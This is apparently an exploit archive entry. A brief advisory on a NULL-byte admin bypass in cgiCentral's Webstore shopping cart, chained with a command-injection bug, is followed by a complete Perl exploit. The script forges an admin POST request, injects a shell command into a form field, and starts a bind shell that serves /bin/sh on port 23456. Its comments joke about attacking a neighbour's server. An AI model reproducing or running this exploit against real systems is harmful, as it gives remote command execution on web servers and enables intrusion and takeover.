source: cgiCentral's Webstore is an shopping cart application which processes and manages online purchases. A vulnerability exists in Webstore which may allow attackers to obtain administrative privileges. The vulnerability is due to a lack of filtering NULL bytes and occurs during the authentication process. In combination with BID 2861, an attacker may be able to execute arbitrary commands on a webserver running Webstore. Bugtraq ID 2861 describes a vulnerability involving un-checked user input being passed to system(). The vulnerable part of the script can only be executed by clients with administrative privileges. This vulnerability may allow a remote attacker to exploit BID 2861 and execute commands on the webserver. #!/usr/bin/perl -w # Sun, May 6, 2001 # exploit by Igor Dobrovitski, [email protected] # The exploit is for the default set-up. A good way to test if your (your neighbour's :) server # is vulnerable. Only for Unix, will now work on NT # Enjoy use Socket; $| = 1; #################################################################################################### $msgfile = '../../Statistics/WebStore_Access.counter'; $userfile = '../Statistics/WebStore_Access.counter'; # if the sploit doesn't work with the above values, comment them out and uncomment ones below #$msgfile = '../../ws_delete_files.cron'; #$userfile = '../ws_delete_files.cron'; # or these if the above fails: #$msgfile = '../../Statistics/index.html'; #$userfile = '../Statistics/index.html'; $exec_code = 'use Socket;$protocol = getprotobyname(tcp);socket(SOCK, PF_INET, SOCK_STREAM, $protocol) ;setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY)); listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, "<&NEW"; open STDOUT, ">&NEW";open STDERR, ">&NEW";exec "/bin/sh -i"}else{close NEW;exit;}'; #################################################################################################### unless(defined $ARGV[0]) {die "Usage: $0\n"} $ARGV[0] =~ s|^(?:http://)*(.*/).*(\..*)$|${1}ws_mail$2|; ($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|; $userfile .= '\0'; $sh_cmd = '55555;perl=\'perl\';test -x /usr/bin/perl && perl=\'/usr/bin/perl\';test -x /usr/local/bin/ perl && perl=\'/usr/local/bin/perl\';$perl -e \'' . $exec_code . '\''; # the above is what's passed to the 'system' command as part of an argument $form = makeform({'userfile' => $userfile, 'kill' => $sh_cmd, 'terminate' => 'whatever', 'admin' => 'yep', 'restart' => 'pls', 'msgfile' => $msgfile}); print "Engaging the enemy. Please stand by...\n"; $SIG{ALRM} = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun an d be nice to the server.\n"; exit }; alarm(20); &send($form); &oops_the_sploit_did_not_work(); sub makeform { my $string; my @blah; my $line = ''; my $here; my %data = %{$_[0]}; foreach my $key (keys %data) { $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB'; } $line =~ s|^(.*)BBBB$|$1|; $line =~ s/\\n/\n/g; $line =~ s/\\t/\t/g; $line =~ s/\\e/\e/g; $line =~ s/\\f/\f/g; $line =~ s/\\r/\r/g; $line =~ s/\\0/\0/g; foreach my $char (split //, $line) { if($char !~ m/[A-Za-z0-9._ ]/) { $char = unpack "H2", $char; $char = '%' . "$char"; } push @blah, $char; } $string = join "",@blah; $string =~ s/AAAA/=/g; $string =~ s/BBBB/&/g; $string =~ s/ /+/g; my $cont_len = length($string); $here = <<EOF; POST $scriptpath HTTP/1.0 User-Agent: Mozilla (Windows 98) Host: $host referer: $host Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-type: application/x-www-form-urlencoded Content-length: $cont_len $string EOF return $here; } sub send { my $form_to_send = shift; my $h = inet_aton($host) or die "Forward lookup for $host failed\n"; socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n"; unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n" ; close(S); exit 1 } select(S); $|=1; print "$form_to_send"; my @reply=<S>; select(STDOUT); close(S); return @reply; } sub oops_the_sploit_did_not_work { print STDERR "The exploit didn't work on this host\nSorry...\n"; exit; }